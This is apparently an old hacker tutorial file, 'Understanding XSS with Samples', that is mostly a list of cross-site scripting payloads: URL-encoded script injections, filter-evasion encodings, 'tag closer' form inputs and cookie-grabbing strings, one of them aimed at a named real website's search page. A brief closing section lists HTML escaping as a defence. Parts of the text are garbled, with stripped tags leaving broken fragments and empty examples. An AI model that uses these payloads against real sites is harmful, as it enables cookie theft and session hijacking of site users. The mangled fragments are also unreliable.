--------------------------------------------------------------------------------------- [+] Understanding XSS with Samples [+] Author: Rohit Bansal --------------------------------------------------------------------------------------- Cross Site Scripting exsistance is because of the lack of filtering engines to user inputs at websites on forms. [example 1] Free ! [example 2] [example 3] PT src=" http://www.Site.com/xss.js"> XSS Cookie theft Javascript http://host/a.php?variable="> Moding Cookies [example 1] How to Search for Vul Hosts [example 1] [host]/ [example 2] [host]// [example 3] [host]/. [example 4] [host]/ [example 5] [host]/\alert(\'XSS\')\<\/script\> [example 6] [host]/perl/\\.pl [example 7] [host]/\\ [example 8] [host]/<\73CRIP\T>alert("dsf")<\/\73CRIP\T> [example 9] [host]/<\73CRIP\T>alert('dsf')<\/\73CRIP\T> [example 10] [host]/alert("dsf") [example 11] [host]/alert('dsf') [example 1] [example 2] [example 3] ""This Site is not Secure! - Also use "?" post request after the host. [example 1] [host]/? WebServers XSS Many webservers have default pages to folders that will look for a file. [example 1] [host]/[folder]/"msgbox%20sadas".bas [example 2] [host]/[folder]/"msgbox%20sadas".asp [example 3] [host]/[folder]/"msgbox%20sadas".jsp [example 4] [host]/[folder]/"msgbox%20sadas".htm [example 5] [host]/[folder]/"msgbox%20sadas".html [example 6] [host]/[folder]/"msgbox%20sadas".[ext] A common place for an XSS hole is inside a server default example files, such as: [example 1] [host]/cgi/example?test= Most common places to find XSS in are the search files of servers. [example 1] [host]/search.php?searchstring= [example 2] [host]/search.php?searchstring="> [example 3] [host]/search.php?searchstring='> Social Engineering XSS Using the characters instead may fool the filters and allow XSS to work. [example 1] [host]/%3cscript%3ealert('XSS')%3c/script%3e [example 2] [host]/%3c%53cript%3ealert('XSS')%3c/%53cript%3e [example 3] [host]/%3c%53cript%3ealert('XSS')%3c%2f%53cript%3e [example 4] [host]/%3cscript%3ealert('XSS')%3c/script%3e [example 5] [host]/%3cscript%3ealert('XSS')%3c%2fscript%3e [example 6] [host]/%3cscript%3ealert(%27XSS%27)%3c%2fscript%3e [example 7] [host]/%3cscript%3ealert(%27XSS%27)%3c/script%3e [example 8] [host]/%3cscript%3ealert("XSS")%3c/script%3e [example 9] [host]/%3c%53cript%3ealert("XSS")%3c/%53cript%3e [example 10] [host]/%3c%53cript%3ealert("XSS")%3c%2f%53cript%3e [example 11] [host]/%3cscript%3ealert("XSS")%3c/script%3e [example 12] [host]/%3cscript%3ealert("XSS")%3c%2fscript%3e [example 13] [host]/%3cscript%3ealert(%34XSS%34)%3c%2fscript%3e [example 14] [host]/%3cscript%3ealert(%34XSS%34)%3c/script%3e - Also use "?" post request after the host. [example 1] [host]/?%3cscript%3ealert('XSS')%3c/script%3e 100% encoded [example 1] [host]/?%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d %65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e [example 2] [host]/?%27%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e %74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e [example 3] [host]/%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%63% 6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e Another form of encoding is: < is encoded as: < > is encoded as: > [example 1] %3Cscript%3Ealert(%22XSS%22)%3C/script%3E [example 2] [example 3] [example 4] [example 5] [example 1] www.pbs.org/search/search_results.html?q=%3Cscript%3Ealert(document.cookie)%3C/script%3E Any of the XSS requests presented above could be used on any asp, cfm, jsp, cgi, php or any other active html file. [example 1] [host]/forum/post.asp? [example 2] [host]/forum/post.asp?%3cscript%3ealert('XSS')%3c/script%3e [example 3] [host]/forum/post.asp?%3cscript%3ealert(%27XSS%27)%3c/script%3e [example 4] [host]/forum/post.asp?%3cscript%3ealert(%34XSS%34)%3c/script%3e [example 5] [host]/forum/post.asp? Finding errors such as inputting a string instead of a number or "\" or "/" instead of a string, or a very long string & a very large number. All this malformed parameters can help us find the place to inject XSS script. Tag Closer The "Tag Closer" method is used by inputing non-alphabetic and non-numeric chars inside form's input text boxes. This chars could be: \,/,~,!,#,$,%,^,&,-,[,],null(char 255),.(dot) But the chars that mostly does the job is either " or '. What we do is just insert "> or '> inside a text box instead of our name/email/username/password and etc... [example 1] [host]/admin/login.asp?username=">&password=1234 [example 2] [host]/admin/login.asp?username=admin&password="> [example 3] [host]/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~"> < /textarea>--> [example 4] [host]/search.php?action=soundex&firstname="> [example 1] [host]/admin/login.asp?username='>&password=1234 [example 2] [host]/admin/login.asp?username=admin&password='> [example 3] [host]/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~'>--> < script>alert('XSS') [example 4] [host]/search.php?action=soundex&firstname='> This mainly works on the servers root: [example 1] [host]/?"> [example 2] [host]/?'> [example 3] [host]/?--> About Another trick for exploiting an XSS was found by putting a <plaintext> tag after the xss code. Sometimes that makes it easie to exploit. [example 1] [host]/?"><script>alert('XSS')</script><plaintext> [example 2] [host]/?'><script>alert('XSS')</script><plaintext> [example 3] [host]/admin/login.asp?username="><script>alert('XSS')</script><plaintext>&password=1234 [example 4] [host]/admin/login.asp?username=admin&password="><script>alert('XSS')</script><plaintext> [example 5] [host]/forum/post.asp?<script>alert('XSS')</script><plaintext> [example 6] [host]/forum/post.asp?%3cscript%3ealert('XSS')%3c/script%3e<plaintext> [example 7] [host]/forum/post.asp?%3cscript%3ealert(%27XSS%27)%3c/script%3e<plaintext> [example 8] [host]/forum/post.asp?%3cscript%3ealert(%34XSS%34)%3c/script%3e<plaintext> [example 9] [host]/forum/post.asp?<script>alert("XSS")</script><plaintext> [example 10] [host]/search.php?action=soundex&firstname="><script>alert(document.cookie)</script>&lt;plaintext> [example 1] www.pbs.org/search/search_results.html?q=%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cplaintext%3E[/code{] } Simple Codes just incase some of them do-not seem to work: [code]< /title><script>alert("XSS");</script><title><plaintext> < script>alert(document.cookie)</script><plaintext> Security Conclusion [Replace] < with < > with > & with & " with &quote; [Possible XSS] <applet> <frameset> <layer> <body> < html> <ilayer> <embed> <iframe> < meta> <frame> <img> <object> < script> <style> --------------------------------------------------------------------------------------- [+]^Rohit Bansal [rohitisback@gmail.com] [+] Schap, Infysec ---------------------------------------------------------------------------------------